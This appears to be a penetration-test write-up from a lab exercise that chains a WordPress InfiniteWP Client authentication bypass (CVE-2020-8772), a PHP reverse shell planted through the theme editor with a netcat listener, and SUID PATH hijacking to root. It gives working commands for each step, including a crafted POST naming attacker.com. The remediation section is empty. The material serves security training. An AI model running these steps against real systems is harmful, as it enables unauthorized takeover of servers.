All Projects
Offensive Lab Web Application CVE-2020-8772 15–20 min read

WordPress Web Exploitation
Auth Bypass, RCE, and Privilege Escalation to Root

External penetration test of a WordPress 5.0.0 application — CVE-2020-8772 plugin authentication bypass to admin access, PHP reverse shell via theme editor, and SUID binary PATH hijacking to achieve root from an unauthenticated starting position.

Engagement Overview

Executive Summary

Nmap identified an outdated WordPress 5.0.0 installation from 2018 running on port 8888. WPScan enumerated the InfiniteWP Client plugin (version 1.9.4.4), vulnerable to CVE-2020-8772 — an authentication bypass allowing unauthenticated users to gain admin access by sending a crafted request. Admin access was achieved without credentials. The WordPress theme editor was used to upload a PHP reverse shell, establishing a foothold as www-data. Local enumeration revealed a custom SUID binary (/usr/local/bin/backup) vulnerable to PATH hijacking, which was exploited to achieve a root shell.

Attack Chain

01
Reconnaissance
Nmap port scan — identified WordPress 5.0.0 on port 8888
02
CVE-2020-8772
InfiniteWP Client auth bypass — WordPress admin access without credentials
03
Initial Foothold
Theme editor PHP reverse shell upload — shell as www-data
04
Privilege Escalation
SUID binary PATH hijacking — root shell achieved

Phase 1 — Reconnaissance

nmap -sC -sV -p- 10.10.10.100

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1
80/tcp   open  http     Apache 2.4.52 — DVWA
3000/tcp open  http     Node.js — OWASP Juice Shop
8888/tcp open  http     WordPress 5.0.0
wpscan --url http://10.10.10.100:8888 --enumerate p

[+] infinitewp-client
  | Version: 1.9.4.4
  | CVE: CVE-2020-8772
  | Title: InfiniteWP Client <= 1.9.4.5 — Unauthenticated Bypass

Phase 2 — CVE-2020-8772 Authentication Bypass

CVE-2020-8772 affects the InfiniteWP Client plugin's add_site action. The plugin fails to properly validate the authentication token when the iwp_action=add_site parameter is supplied, allowing an unauthenticated attacker to authenticate as any WordPress admin user by providing the admin username in a crafted POST request.

# Exploit CVE-2020-8772 — authenticate as admin without password
curl -s -X POST "http://10.10.10.100:8888/wp-login.php" \
  --data 'iwp_action=add_site&iwp_address=http://attacker.com&username=admin'

# Response indicates successful admin session creation
# Admin dashboard now accessible

WordPress admin dashboard accessible. No credentials were used at any point.

Phase 3 — Initial Foothold via Theme Editor

With admin access, the WordPress theme editor provides direct PHP file editing capability. The 404.php template was replaced with a PentestMonkey PHP reverse shell pointing to the attacker's Netcat listener.

# Start listener on attacker machine
nc -lvnp 4444

# Trigger the reverse shell by requesting the 404 page
curl http://10.10.10.100:8888/wp-content/themes/twentynineteen/404.php
# Shell received — stabilize with python pty
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z → stty raw -echo; fg

www-data@ubuntu:/var/www/html$

Phase 4 — Privilege Escalation

Local enumeration identified a custom SUID binary at /usr/local/bin/backup. Running strings on the binary revealed it calls tar using a relative path — vulnerable to PATH hijacking.

# Identify SUID binaries
find / -perm -u=s -type f 2>/dev/null

/usr/local/bin/backup  ← Non-standard SUID binary

# Examine binary for exploitable commands
strings /usr/local/bin/backup | grep -E 'tar|cp|cat'

tar cf /tmp/backup.tar /var/www/html  ← calls tar without full path
# PATH hijacking exploit — create malicious tar binary
cd /tmp
echo '#!/bin/bash' > tar
echo 'bash -p' >> tar
chmod +x tar
export PATH=/tmp:$PATH

# Execute SUID binary — calls our malicious tar
/usr/local/bin/backup

root@ubuntu:/tmp#  ← Root shell achieved

Findings & Remediation

MITRE ATT&CK Mapping

Tools Used

Nmap
WPScan
curl
Netcat
PentestMonkey PHP Shell
Linux utilities